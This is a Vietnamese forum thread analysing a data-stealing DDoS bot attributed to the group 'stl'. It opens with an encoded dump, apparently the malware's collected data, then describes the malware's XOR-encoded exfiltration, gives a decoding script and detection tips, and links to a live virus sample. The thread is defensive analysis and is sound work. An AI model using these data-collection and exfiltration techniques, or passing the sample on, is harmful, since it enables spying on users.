r{i=3SXI=[o|pxjrov=.3(=NM,..Uri{te={ro=Pt~ornr{i=3SXI=[o|pxjrov=.3(=NM,=5V_$(.($(4..Uri{te={ro=Pt~ornr{i=3SXI=[o|pxjrov=.3(=NM,=5V_$(%)%)4..Hmy|ix={ro=Pt~ornr{i=3SXI=[o|pxjrov=.3(=NM,=5V_$+.*-*4..zxsxo|qirrqnBe%+{ox..htqyirrqnBt|+){ox..P|ovxiOxnx|o~u..qtnBt|+){ox..nyk..jsxiqtnBe%+{ox..m{yBt|+){ox..trpxiot~irrqnBe+){ox..msmirrqnBt|+){ox..motsin|pmqxn..|kniox|pn|pmqxn..htqyirrqnBe+){ox..tsni|qquxqm..pryxpirrqn..qhxirriuirrqnBt|+){ox..Xp|o~|yxor=Yxqmut=|sy=^66_htqyxo=/-,-=Y|i||nx=M|~v..r{{oxzBe+){ox..jmyirrqnBe+){ox..Pt~ornr{i=Ktnh|q=Nihytr=/--%=Mxo{rop|s~x=^rqqx~itrs=Irrqn=0=XSH..j~rtsni|qqxon..jnyirrqBt|+){ox..jnyirrqBe+){ox..Ox|qixv=Utzu=Yx{tstitrs=\hytr=Yotkxo..Xp|o~|yxor=Yxqmut=|sy=^66_htqyxo=/-,-=Uxqm=Ndnixp..sxijrovqto|otxnBe+){ox..jy{irrqnBe+){ox..PNEPQ=)3-=NM/=5V_$*.+%%4..^ryxZx|o=Yxqmut=|sy=^66_htqyxo=/--$=Uxqm=Ndnixp..ktni|qtnBe%+{ox..jmyirrqnBt|+){ox..^ryxZx|o=Yxqmut=|sy=^66_htqyxo=/--$=Y|i||nx=M|~v..m~tyokn|pmqx..Pt~ornr{i=Ktnh|q=^66=/--%=Oxytniothi|qx=0=e%+=$3-3/,-//..
[27/09/2011 3:13:18 PM:281]
EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE.EEE,YEE,YEEEEEEEEEEEEEE/.---/[X%-\\+(Y%\,_,X\Y,^(\%X)-[/-,__0_^--0---,-%^X)\X-)**Y^\^[----,+%[.-.(-.,.EMNM..mk.^'AIxpmAO^XAKtohnALII|nvAMX[tqxnA~kxontrsn3ts.(*%)$-+(.F(3,3/+--@=0=NM=.=0=MI=,=0=NP=/(+=0=UY=_-)\*X$Y=0=ST^=--'-\'(X'/,'__'$+=0=_|t=PY--%--0_WYJ3PJ-JP\P$..$//.*=====.-y=,u=.p=a=----0--0--=--'--'--.RdmLLYO-$~PvUM+RLMS_Iz  BmXhTMnwQjNv*gSh)vZX+Hz  3FB@FB@FB@39\yrx=[q|nu=Mq|dxo=,-=\~itkxE..\yrx=[q|nu=Mq|dxo=,-=Mqhzts.._r~un=/3)3+=5oxprkx=rsqd4.._rrni=Qto|otxn={ro=^66_htqyxo=/-,-..^rmxost~=Yxnvirm=Nx|o~u=0=Urpx..Xp|o~|yxor=Yxqmut=|sy=^66_htqyxo=/-,-=Y|i||nx=M|~v..Xp|o~|yxor=Yxqmut=|sy=^66_htqyxo=/-,-=Uxqm=Ndnixp..Xp|o~|yxor=O\Y=Nihytr=/-,-..UM=Q|nxoWxi=P,.,$=P[M=Nxotxn..V|nmxonvd=\sit0Ktohn=/-,,..Tsixosxi=Xemqroxo..Nx~hotid=Hmy|ix={ro=Jtsyrjn=EM=5V_/)*+)$-4..Nx~hotid=Hmy|ix={ro=Jtsyrjn=EM=5V_/(-.++(4..Nx~hotid=Hmy|ix={ro=Jtsyrjn=EM=5V_/(-*$.%4..Nx~hotid=Hmy|ix={ro=Jtsyrjn=Tsixosxi=Xemqroxo=%=5V_/(.-()%4..Nx~hotid=Hmy|ix={ro=Jtsyrjn=EM=5V_/(.((,/4..Nx~hotid=Hmy|ix={ro=Jtsyrjn=EM=5V_/(.+/*+4..Nx~hotid=Hmy|ix={ro=Jtsyrjn=EM=5V_/(.+/*+0k/4..Hmy|ix={ro=Jtsyrjn=EM=5V_/(),*+.4..Nx~hotid=Hmy|ix={ro=Jtsyrjn=Tsixosxi=Xemqroxo=%=5V_/())(/,4..Nx~hotid=Hmy|ix={ro=Jtsyrjn=EM=5V_/())%$.4..Nx~hotid=Hmy|ix={ro=Jtsyrjn=EM=5V_/((($,*4..Nx~hotid=Hmy|ix={ro=Jtsyrjn=Tsixosxi=Xemqroxo=%=5V_/(($-)$4..Nx~hotid=Hmy|ix={ro=Jtsyrjn=EM=5V_/(+/$.*4..Nx~hotid=Hmy|ix={ro=Jtsyrjn=EM=5V_/(++)()4..Nx~hotid=Hmy|ix={ro=Jtsyrjn=EM=5V_/(+*+%-4..Nx~hotid=Hmy|ix={ro=Jtsyrjn=EM=5V_/(*-///4..Uri{te={ro=Jtsyrjn=EM=5V_/(*-*$,4..Nx~hotid=Hmy|ix={ro=Jtsyrjn=EM=5V_/(*-$)*4..Hmy|ix={ro=Jtsyrjn=EM=5V_/+-**,/4..Hmy|ix={ro=Jtsyrjn=EM=5V_/+,++*+4..Pt~ornr{i=Jtsyrjn=Yotkxo=Vti=*3,3-3*+--..V0Qtix=Pxz|=^ryx~=M|~v=)3%3(..Pt~ornr{i=3SXI=[o|pxjrov=.3(=NM,..Pt~ornr{i=Ktnh|q=W>=/3-=Oxytniothi|qx=M|~v|zx..Pt~ornr{i=Ktnh|q=Nihytr=/--%=Mxo{rop|s~x=Irrqn=0=XSH..Pt~ornr{i=Ktnh|q=Nihytr=Ix|p=Ndnixp=/--%=Ix|p=Nhtix=0=XSH..Prgtqq|=[tox{re=+3-3/=5e%+=xs0HN4..PNYS=Qto|od={ro=Ktnh|q=Nihytr=/--%=0=XSH..Pt~ornr{i=Ixei0ir0Nmxx~u=Xsztsx=)3-=5Xszqtnu4..Mdiurs=/3*=mdjts./0/,+..O|kx=Oxmroin=*3*3-=_X..HstVxd=)3-=SI..Pt~ornr{i=Vxosxq0Pryx=Yotkxo=[o|pxjrov=[x|ihox=M|~v=,3(..JtsM~|m=)3,3/..JtsO\O=|o~utkxo..D|urr<=Pxnnxszxo..Pt~ornr{i=Ktnh|q=^66=/--%=\IQ=Hmy|ix=v$*.$/)=0=e%+=$3-3.-*/$3),)%..UIVV..nxsnron|pmqxn..Pt~ornr{i=Jtsyrjn=NYV={ro=Ktnh|q=Nihytr=/--%=3SXI=[o|pxjrov=Irrqn=0=xsh..ktni|qtnBe+){ox..jy{irrqnBt|+){ox..Q|~=Ktxi=piy$=XK\..sxijrovqto|otxnBt|+){ox..ir|nixopxi|y|i|m|~v|zxn|pmqx..ts{n|pmqxBe+){ox..sxijrovqto|otxnBe%+{ox..yn{n|pmqxn..nxihmn|pmqxn..P|ovxiOxnx|o~u..nxihmirrqnBe+){ox..Pt~ornr{i=Ktnh|q=^66=/-,-==e%+=Oxytniothi|qx=0=,-3-3.-.,$..tp|ztszirrqnBe%+{ox..msmirrqnBe+){ox..mrjxop|s|zxpxsiBt|+){ox..Pt~ornr{i=Ktnh|q=^66=/--%=Oxytniothi|qx=0=e%+=$3-3.-*/$3),)%..ux|yxon..[|eNxihmTsni|qqxo..W|k|5IP4=+=Hmy|ix=/+..qhxirriun|pmqxn..|hytrn|pmqxn..zxsxo|qirrqnBt|+){ox..ktni|qtnBt|+){ox..Mdiurs=/3*3,..htqyirrqnBe%+{ox..r{{oxzBt|+){ox..io|~tszirrqBe+){ox..irrqnBt|+){ox..motsiirrqnBt|+){ox..motsiirrqnBe+){ox..PNYS=Qto|od={ro=Ktnh|q=Nihytr=/--%=0=XSH..irrqtsyxe..io|~tszirrqBt|+){ox..Pt~ornr{i=Ktnh|q=Nihytr=/--%=Mxo{rop|s~x=^rqqx~itrs=Irrqn=Nrho~x=^|~ux..yxhz{tqxnBjts*..io|~tszirrqBe%+{ox..ummhnzP,.,-..zxsxo|qn|pmqxn..ir|nixon|pmqx..{tox{qdn|pmqx..xkxsin|pmqx..trpxiot~n|pmqxn..W|k|=\hir=Hmy|ixo..qtnBe+){ox..tp|ztszirrqnBt|+){ox..m{yBe+){ox..jsxiqtnBe+){ox..~|s~xqn|pmqx..qhxirriuirrqnBe+){ox..~uvts{irrqBe%+{ox..jy{irrqnBe%+{ox..ntyxnurjn|pmqxn..ox|ypx..sxijrovn|pmqxn..PNEPQ=+=Nxokt~x=M|~v=/=5V_$*.+%+4..mroitrn|pmqx..trpxiot~irrqnBe%+{ox..Ro|~qx=KP=Ktoih|q_re=)3-3,/..niro|zxn|pmqxn..hnn|pmqxn..np|oi~|oyn|pmqxn..|kniox|pirrqnBe%+{ox..jsxiqtnBt|+){ox.._rrni=Qto|otxn={ro=^66_htqyxo=/--$..Pt~ornr{i=Jtsyrjn=NYV={ro=Ktnh|q=Nihytr=/--%=NYV=Ox{xoxs~x=\nnxpqtxn=|sy=TsixqqtNxsnx..ton|pmqxn..V|nmxonvd=Tsixosxi=Nx~hotid=/-,,..msmirrqnBe%+{ox..Pt~ornr{i=Yr~hpxsi=Xemqroxo=/--%..Pt~ornr{i=Ktnh|q=W>=/3-=Oxytniothi|qx=M|~v|zx..niox|ppxyt|n|pmqxn..r{{oxzBe%+{ox..Pt~ornr{i=Ktnh|q=^66=/--(=Oxytniothi|qx..hnn|pmqxn..yokirrqnBt|+){ox..Ox~xtkxTsni|qqxo..UM=Q|nxoWxi=Irrqre..Pt~ornr{i=Ktnh|q=^66=/--(=\IQ=Hmy|ix=v$*.$/.=0=e%+=%3-3(-*/*3)-(...Ktnh|q=^66=/--%=e%+=Ohsitpx=0=5k$3-3.-*/$3),)%4..Ktnh|q=^66=/--%=e%+=Ohsitpx=0=k$3-3.-*/$3),)%..ts{n|pmqxBe%+{ox..Nr{ij|ox=Hmy|ix={ro=Jx=[rqyxon..Pt~ornr{i=Jtsyrjn=Yotkxo=Vti=Yr~hpxsi|itrs=*+--3-$,/-,..y{eBt|+){ox..Pt~ornr{i=Ktnh|q=Nihytr=Ix|p=Ndnixp=/--%=Ix|p=Nhtix=0=XSH..Nx~hotid=Hmy|ix={ro=Pt~ornr{i=Ktnh|q=Nihytr=Ix|p=Ndnixp=/--%=Ix|p=Nhtix=0=XSH=5V_//(,)%*4..Pt~ornr{i=Ktnh|q=Nihytr=Ix|p=Ndnixp=/--%=Ix|p=Nhtix=0=XSH=Nxokt~x=M|~v=,=5V_$)(,)-4..Uri{te={ro=Pt~ornr{i=Ktnh|q=Nihytr=Ix|p=Ndnixp=/--%=Ix|p=Nhtix=0=XSH=5V_$*,-$/4..xksiyokn|pmqx..m{yBe%+{ox..Yxhzztsz=Irrqn={ro=Jtsyrjn=5e%+4..Pt~ornr{i=Jtsyrjn=NYV={ro=Ktnh|q=Nihytr=/--%=Ux|yxon=|sy=Qto|otxn..jmyirrqnBe%+{ox..PNEPQ=)3-=NM/=5V_$()).-4..Pt~ornr{i=Ktnh|q=^66=/--%=Oxytniothi|qx=0=V_/)+*,*)=0=e%+=$3-3.-*/$3((*-..y{eBe%+{ox..Pt~ornr{i=Ntqkxoqtzui..Tsixq5O4=Xeioxpx=Zo|mut~n=/=Yotkxo..nxihmirrqnBe%+{ox..irrqnBe+){ox..yokirrqnBe%+{ox..Pt~ornr{i=R{{t~x=Mor{xnntrs|q=Xytitrs=/--...^rpm|ittqtid=M|~v={ro=iux=/--*=R{{t~x=ndnixp..utyBtsmhin|pmqxn..Pt~ornr{i=Ktnh|q=Nihytr=/--%=Mxo{rop|s~x=Irrqn=0=XSH..tr~iqn|pmqx.._rrni=Qto|otxn={ro=^66_htqyxo=/-,-..Pt~ornr{i=\mmqt~|itrs=Xooro=Oxmroitsz..UM=Q|nxoWxi=P,.,$=P[M=Nxotxn=Irrqre..utyn|pmqxtsmhi..y{eBe+){ox..mrjxop|s|zxpxsiBe%+{ox..htqyn|pmqxn..Pt~ornr{i=Ktnh|q=^66=/--%=Oxytniothi|qx=0=e%+=$3-3.-*/$3,*..Pt~ornr{i=Ktnh|q=^66=/--%=Oxytniothi|qx=0=e%+=$3-3.-*/$3+,+,..jemqtnBe%+{ox..zxsxo|qirrqnBe+){ox..\QMN=Irh~u=M|y=Yotkxo..hpy{n|pmqxn..Pt~ornr{i=3SXI=[o|pxjrov=.3-=Nxokt~x=M|~v=/..ytnmq|dn|pmqxn..ts{n|pmqxBt|+){ox..PokqHnzIo|~vtsz..qhxirriuirrqnBe%+{ox..tp|ztszirrqnBe+){ox..Xp|o~|yxor=O\Y=Nihytr=/-,-..jnyirrqBe%+{ox..yokirrqnBe+){ox..jmyn|pmqxn..Pt~ornr{i=Jtsyrjn=NYV={ro=Ktnh|q=Nihytr=/--%=NM,=Jts./=Irrqn..nxihmirrqnBt|+){ox..mrjxop|s|zxpxsiBe+){ox..motsiirrqnBe%+{ox..qtnBe%+{ox..jptn|pmqxn..|kniox|pirrqnBt|+){ox..|kniox|pirrqnBe+){ox..msmmroinn|pmqx..YN[0VtiNxihm..t{nn|pmqxn..Pt~ornr{i=3SXI=[o|pxjrov=/3-=Nxokt~x=M|~v=/..njihsxo..utyn|pmqxn..N~|s=Ir..[|eNxsyTsni|qqxo..OX\QIXV=ZX=;=[X=Xiuxosxi=M^T0X=ST^=Yotkxo..Pt~ornr{i=Jtsyrjn=NYV={ro=Ktnh|q=Nihytr=/--%=NM,=Irrqn..r|~oBe%+{ox..irrqnBe%+{ox..Pt~ornr{i=3SXI=[o|pxjrov=.3(=NM,..Uri{te={ro=Pt~ornr{i=3SXI=[o|pxjrov=.3(=NM,=5V_$(.($(4..Uri{te={ro=Pt~ornr{i=3SXI=[o|pxjrov=.3(=NM,=5V_$(%)%)4..Hmy|ix={ro=Pt~ornr{i=3SXI=[o|pxjrov=.3(=NM,=5V_$+.*-*4..zxsxo|qirrqnBe%+{ox..htqyirrqnBt|+){ox..P|ovxiOxnx|o~u..qtnBt|+){ox..nyk..jsxiqtnBe%+{ox..m{yBt|+){ox..trpxiot~irrqnBe+){ox..msmirrqnBt|+){ox..motsin|pmqxn..|kniox|pn|pmqxn..htqyirrqnBe+){ox..tsni|qquxqm..pryxpirrqn..qhxirriuirrqnBt|+){ox..Xp|o~|yxor=Yxqmut=|sy=^66_htqyxo=/-,-=Y|i||nx=M|~v..r{{oxzBe+){ox..jmyirrqnBe+){ox..Pt~ornr{i=Ktnh|q=Nihytr=/--%=Mxo{rop|s~x=^rqqx~itrs=Irrqn=0=XSH..j~rtsni|qqxon..jnyirrqBt|+){ox..jnyirrqBe+){ox..Ox|qixv=Utzu=Yx{tstitrs=\hytr=Yotkxo..Xp|o~|yxor=Yxqmut=|sy=^66_htqyxo=/-,-=Uxqm=Ndnixp..sxijrovqto|otxnBe+){ox..jy{irrqnBe+){ox..PNEPQ=)3-=NM/=5V_$*.+%%4..^ryxZx|o=Yxqmut=|sy=^66_htqyxo=/--$=Uxqm=Ndnixp..ktni|qtnBe%+{ox..jmyirrqnBt|+){ox..^ryxZx|o=Yxqmut=|sy=^66_htqyxo=/--$=Y|i||nx=M|~v..m~tyokn|pmqx..Pt~ornr{i=Ktnh|q=^66=/--%=Oxytniothi|qx=0=e%+=$3-3/,-//...EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE.EEEEEEEEEEEEEEEEEEEEEEE
[27/09/2011 3:13:18 PM:468]
00000000  67 00 00 00                                                                                          g...

Phân tích tính chất vài trận DDoS HVA vừa qua.

pduck56 — GMT

Một mẫu Virus của stl: http://www.mediafire.com/download.php?bv4j1tov7pkn0v0 Mình đã tìm trong History của trình duyệt theo ngày tháng mà Avast phát hiện, từ đó tìm ra nguyên nhân lây nhiễm. Cũng có thể mẫu này đã cũ, nhưng mình cũng mong là mọi người có cách ngăn chặn nguồn lây nhiễm này. Link của nguồn lây nhiễm mình đặt trong file text cùng thư mục. Mọi người muốn biết thông tin gì thêm mình sẽ cố gắng cung cấp. Rất cám ơn anh TQN, anh hãy cố gắng lên mọi người luôn ở bên anh.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Do bản UltraSuft mà bạn pduck56 down về được ai đó kèm mã độc và protect = Themida nên Avast của bạn báo là malware. Cũng đúng thôi. UltraSuft là phần mềm free, các bạn nên lên chính website mà down, và đừng download soft, crack lại các forum, các site, các trang chia sẽ... Đệ tử của stl nhiều lắm, chổ nào cũng có, tụi nó sẽ bonus thêm cho các bạn vài con "mèo què" của stl ! Cversions.2.db giao tiếp với các host trên qua cỗng 443, cổng của HTTPS, nhưng lại chã phải là HTTPS gì cả. Coder của stl chỉ đơn thuần dùng pure socket API send và recv để gửi và nhận. Thông tin (char buffer) gởi đi được xor từng byte với 0x1D, còn thông tin nhận về được xor từng byte với 0x45 ('E' char) để lấy lại string ra lệnh nguyên thuỷ. Ngoài thông tin về username, computer name, hardware: disk, cpu, MAC address, các process đang run, windows name đang mở, con cversions.2.db này còn lấy hết danh các software, các MS update đã install trên máy victim và gởi đi. Cái list softwares này mới là nhiều nè. Máy em thôi sơ sơ ra khoãng 102 dòng thôi. Vì vậy mấy anh stl cứ phải giãi mã mệt nghỉ luôn ;)

Phân tích tính chất vài trận DDoS HVA vừa qua.

raulgonzalez — GMT

TQN wrote:

Các thông tin về victim, về cấu hình phần cứng, serial number của CPU, harddisk, username, computername, licenseID, danh sách các phần mềm đã instal, IE ver, path, name của thư mục %UserProfile%... mà mấy anh còn lấy được, còn úp về được thì victim hết đường chối khi mấy anh muốn "bạch hoá". Thậm chí em đang run những phần mềm nào trên máy, mấy anh còn lấy list luôn (PSAPI hay ToolHelp32 API), dùng EnumWindows hết tất cả window đang mở rồi ghi xuống Global Temp File của mấy anh (so siếc, encode gì đó xong) rồi để up đi thì còn cái gì của victim mà mấy anh không biết nữa ? Mấy anh đang vi phạm trắng trợn quyền bảo mật thông tin của công dân đấy nhé !

Các thông tin khác em không nói, nhưng stl lấy thông tin về cấu hình phần cứng, serial number của CPU, harddisk, username, computername, licenseID thì em nghĩ các đồng chí stl là người của Orange rồi, vì hacker bình thường lấy mấy thông tin có vẻ không hữu dụng khác, còn với Orange thì, he he, đó là bằng chứng.

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

raulgonzalez viết là CAM (Công An Mạng) thì viết rõ ra, đừng viết Orange bắt người đọc phải suy diễn.

Phân tích tính chất vài trận DDoS HVA vừa qua.

texudo — GMT

Kinh quá, lại còn chơi trò bắt người vì sử dụng phần mềm lậu nữa ah, hic hic. Btw, đây cũng là một lý do để đưa người ta vào tù được. Giang hồ hiểm ác, lòng người khó lường..

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Bởi vậy, em mới tức cảnh làm thơ: "Giang hồ hiểm ác em không sợ. Chỉ sợ mèo què "ét ti eo" =)) " Chỉ sợ hay không sợ ha bà con ? Bà con làm tiếp cho vui ! Em giờ đang stress, cái hàm TEA encode/decode của mấy anh stl chế quái quá ! Toàn bộ thông tin mà cversions.2.db thu nhập về victim sau khi gởi đi sẽ được mã hoá và lưu trong thư mục %LocalAppData%\Apps\GDIPFONTCACHEV1.DAT. Bà con nào nếu tìm thấy file GDIPFONTCACHEV1.DAT này, trong thư mục Apps nhé (vì có nhiều GDIPFONTCACHEV1.DAT file) thì có thể dùng 010 Editor script sau để giải mã và xem, thử có giật mình không: Code:

//----------------------------------------------------------------------------
//--- 010 Editor v3.2 Script File
//
// File: DecodeGDIPFontCacheV1.1sc
// Author: ThangCuAnh (TQN) 
// Revision: 1.0
// Purpose: Decode file GDIPFONTCACHEV1.DAT
//----------------------------------------------------------------------------
int i, j, size = FileSize();
unsigned char xorBuf[size], val;

if (size <= 0)
{
    MessageBox(idOk, "DecodeGDIPFontCacheV1", "No file loaded or file empty.");
    return -1;
}

// Modify bytes
for (i = 0, j = 0; i < size; i++)
{
    val = (ReadUByte(i) ^ i) ^ 0x10;
    if (val == 0x9)
    {
        val = 0xA;
    }
    if (val != 0x00)
    {
        xorBuf[j] = val;
        j++;
    }
}

int newFile = FileNew();
FileSelect(newFile);    // force select new file
WriteBytes(xorBuf, 0, j);

Phân tích tính chất vài trận DDoS HVA vừa qua.

LIA — GMT

Sao anh TQN kg post mấy cái con virus của stl lên các forum RCE nước ngoài í. Có gì họ post kết quả phân tích của họ lên. Mình chỉ việc xem thôi! Đỡ mệt :D

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Post thì dể, nhưng liệu tụi nó có tâm huyết, có thời gian phân tích kỹ lưỡng 1 đống file trong 1 cục mèo què này không em ? Khó ở chổ là mèo què của stl trải dài tính năng ra 1 loạt file PE, chứ không dồn vào 1 file PE như các virus khác, nên nếu chỉ RCE 1 file thôi thì chưa thể khẳng định đó là mèo què hay mèo bình thường ! Anh chỉ cần bà con mình up cái QTTask.zip đó cho các AVs là được rồi, viết mail "năn nỉ" luôn, thì trước sau gì tụi stl cũng cạn kiệt mẫu, bó tay.com, không còn quậy phá ai được nữa hết !

Phân tích tính chất vài trận DDoS HVA vừa qua.

latlaobao — GMT

wwwz.vietnamnet.vn cũng die luôn rồi. Như vậy stl vẫn còn một số mẫu nào đó mà các avs chưa phát hiện được.

Phân tích tính chất vài trận DDoS HVA vừa qua.

xomcat3 — GMT

Em vẫn vào được các bác a. Hướng dẫn cách truy cập vào VietNamNet Trong lúc việc truy cập vào Báo VietNamNet đang gặp khó khăn do sự cố kĩ thuật, độc giả có thể tạm thời truy cập vào VietNamNet theo 2 địa chỉ: http://vietnamnet.com.vn/ hoặc http://wwwz.vietnamnet.vn/. Báo VietNamNet rất mong Quý độc giả thông cảm về sự cố bất khả kháng này, tiếp tục chia sẻ và đồng hành cùng Báo VietNamNet. Xin cảm ơn! VietNamNet

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Theo tôi thì chắc chắn còn một con nằm vùng nào đó đang down một con bot DDOS mới vào VNN mà chúng ta còn chưa biết. Tôi chợt nghĩ, có lẽ mẫu bot mới này cũng đã được stl coder add code detect Wireshark, EtherD, SmartSniff vào. Code đó sẽ cũng làm tương tự như cversions.2.db của QTTask, nếu detect thấy sniffer thì nằm im, ngủ :-( Nhưng code detect sniffer của stl coder rất dể vượt qua. Vì vậy tui đã patch sơ sơ lại SmartSniff của Nirosoft để đoạn code detect này sẽ vô dụng với SmartSniff. SmartSniff rất nhỏ, không cần cài đặt, dể dùng, portable, nên tôi khuyến khích moị người dùng. File sniffsm.zip http://www.mediafire.com/?sjreraa710iqkqn chính là SmartSniff đã được tui patch vài chổ. Bà con down về, run, vào menu "Capture Options", set lại Capture Method và "Select network adapter" tương ứng với máy mình là xong. Hy vọng bà con dùng cái sniffsm (Sniff Smart;)) này để tóm được thằng bot đang DDOS VNN.

Phân tích tính chất vài trận DDoS HVA vừa qua.

stf — GMT

Để xác định nhanh xem máy tính của mình có dính bot đang tấn công VietnamNet hay không, bạn có thể tắt hết trình duyệt (IE, FF, Chrome,...), chat yahoo, skype, zing,... rồi vào màn hình console (cmd.exe) chạy lệnh Code:

netstat

để xem danh sách các kết nối ra ngoài (ESTABLISHED), nếu thấy xuất hiện tên domain có .vn, hoặc dãy IP của Việt nam thì chạy tiếp các tool sniff để lấy thêm thông tin. Trang kiểm tra thông tin về địa chỉ IP: http://all-nettools.com/toolbox/smart-whois.php Danh sách các tool sniff: http://thedatalist.com/pages/Packet_Sniffing.htm (có thể sử dụng những tool khác với SmartSniff, Wireshark,... để mong STL chưa update code kịp :)

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

Có một cách đơn giản nữa là dùng option "-o" trên Windows (từ Windows 2000 trở đi đã có option này) để xác định PID (process ID) của từng socket. Sau đó, dùng taskmanager và chỉnh trong "View" list để hiển thị giá tri PID rồi xem list của "Processes" trên taskmanager là biết ngay cái .exe nào có PID muốn xem. Muốn nữa thì dùng mấy cái tool nho nhỏ như fport (http://www.mcafee.com/us/downloads/free-tools/fport.aspx) hay tcpview (http://technet.microsoft.com/en-us/sysinternals/bb897437) là thấy hết. Những tool nho nhỏ như vậy nhiều vô kể. Làm sao mà stl "check" cho hết được? Malware của stl mà chơi trò lock luôn task manager thì đích thị con nai vàng malware rồi. Không cần báo AV thì AV cũng tóm cổ ngay tại chỗ.

Phân tích tính chất vài trận DDoS HVA vừa qua.

batigol — GMT

Chào các anh. Em cũng tò mò đọc các phân tích của các anh. Thì thấy chủ yếu là các anh nói về nguyên nhân, hiện tượng nhưng chưa thấy ai đưa ra biện pháp chống đỡ thiết thực cả? @anh Conmale: theo anh thì ddos thì nên chống thế nào thì hiệu quả nhất ạ? em cũng có xem qua nhiều tài liệu nhưng chưa thấy biện pháp nào khả thi cả. Vietnamnet có vẻ đã có giải pháp tốt cho vấn đề này. các anh thử vào xem? http://vietnamnet.vn

Phân tích tính chất vài trận DDoS HVA vừa qua.

_KjlL_ — GMT

Vậy mình nghĩ bạn nên đọc lại từ page 1 có thấy bàn luận nhiều mà ! Ngoài b cũng có thể đọc thêm /hvaonline/posts/list/112.html

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

batigol wrote:

Chào các anh. Em cũng tò mò đọc các phân tích của các anh. Thì thấy chủ yếu là các anh nói về nguyên nhân, hiện tượng nhưng chưa thấy ai đưa ra biện pháp chống đỡ thiết thực cả? @anh Conmale: theo anh thì ddos thì nên chống thế nào thì hiệu quả nhất ạ? em cũng có xem qua nhiều tài liệu nhưng chưa thấy biện pháp nào khả thi cả. Vietnamnet có vẻ đã có giải pháp tốt cho vấn đề này. các anh thử vào xem? http://vietnamnet.vn

Làm sao mà đưa ra biện pháp nếu như không nắm rõ hệ thống vietnamnet có gì? Chống hiệu quả nhất cho hệ thống bao gồm cái gì?

Phân tích tính chất vài trận DDoS HVA vừa qua.

batigol — GMT

conmale wrote:

batigol wrote:

Chào các anh. Em cũng tò mò đọc các phân tích của các anh. Thì thấy chủ yếu là các anh nói về nguyên nhân, hiện tượng nhưng chưa thấy ai đưa ra biện pháp chống đỡ thiết thực cả? @anh Conmale: theo anh thì ddos thì nên chống thế nào thì hiệu quả nhất ạ? em cũng có xem qua nhiều tài liệu nhưng chưa thấy biện pháp nào khả thi cả. Vietnamnet có vẻ đã có giải pháp tốt cho vấn đề này. các anh thử vào xem? http://vietnamnet.vn
Làm sao mà đưa ra biện pháp nếu như không nắm rõ hệ thống vietnamnet có gì? Chống hiệu quả nhất cho hệ thống bao gồm cái gì?

giả sử thế này anh nhé. Hệ thống gồm 2 server, một firewall đặt trước, băng thông thi ko phải nghĩ nhưng performance của server thì phải nghĩ đó anh. làm sao để xử lý ddos mà vẫn đảm bảo cho valid user truy cập bình thường?

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

batigol wrote:

conmale wrote:

batigol wrote:

Chào các anh. Em cũng tò mò đọc các phân tích của các anh. Thì thấy chủ yếu là các anh nói về nguyên nhân, hiện tượng nhưng chưa thấy ai đưa ra biện pháp chống đỡ thiết thực cả? @anh Conmale: theo anh thì ddos thì nên chống thế nào thì hiệu quả nhất ạ? em cũng có xem qua nhiều tài liệu nhưng chưa thấy biện pháp nào khả thi cả. Vietnamnet có vẻ đã có giải pháp tốt cho vấn đề này. các anh thử vào xem? http://vietnamnet.vn
Làm sao mà đưa ra biện pháp nếu như không nắm rõ hệ thống vietnamnet có gì? Chống hiệu quả nhất cho hệ thống bao gồm cái gì?
giả sử thế này anh nhé. Hệ thống gồm 2 server, một firewall đặt trước, băng thông thi ko phải nghĩ nhưng performance của server thì phải nghĩ đó anh. làm sao để xử lý ddos mà vẫn đảm bảo cho valid user truy cập bình thường?

Mơ hồ quá em. Xử lý ddos nào? Có hàng ngàn biến thái của ddos. Chẳng có một giải pháp nào có thể áp dụng cho mọi trường hợp hết. Riêng với vietnamnet thì thông tin chính xác về topology cũng như các cơ cấu bên trong thì chẳng mấy ai biết và nếu có biết thì cũng biết theo kiểu "black box". Các thảo luận về giải pháp cho vietnamnet (với cấp độ biết kiểu "black box") thì đã có rẩt nhiều trên diễn đàn rồi. Em chịu khó tìm và đọc lại. Ngay trả trong chủ đề này cũng có mà em chưa đọc kỹ đó thôi.

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

Avira đã có tường trình về con QTTask.exe: Filename Result QTTask.dll MALWARE The file 'QTTask.dll' has been determined to be 'MALWARE'. Our analysts named the threat .The term "TR/" denotes a trojan horse that is able to spy out data, to violate your privacy or carry out unwanted modifications to the system.Detection will be added to our virus definition file (VDF) with one of the next updates. Filename Result QTTask.exe MALWARE The file 'QTTask.exe' has been determined to be 'MALWARE'. Our analysts named the threat .The term "TR/" denotes a trojan horse that is able to spy out data, to violate your privacy or carry out unwanted modifications to the system.Detection will be added to our virus definition file (VDF) with one of the next updates. Filename Result rdpuser.mof MALWARE The file 'rdpuser.mof' has been determined to be 'MALWARE'. Our analysts named the threat .The term "TR/" denotes a trojan horse that is able to spy out data, to violate your privacy or carry out unwanted modifications to the system.Detection will be added to our virus definition file (VDF) with one of the next updates. Filename Result rfc2616.exe MALWARE The file 'rfc2616.exe' has been determined to be 'MALWARE'. Our analysts named the threat .The term "TR/" denotes a trojan horse that is able to spy out data, to violate your privacy or carry out unwanted modifications to the system.Detection will be added to our virus definition file (VDF) with one of the next updates. Filename Result rwoqv.exe MALWARE The file 'rwoqv.exe' has been determined to be 'MALWARE'. Our analysts named the threat .The term "TR/" denotes a trojan horse that is able to spy out data, to violate your privacy or carry out unwanted modifications to the system.Detection will be added to our virus definition file (VDF) with one of the next updates.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

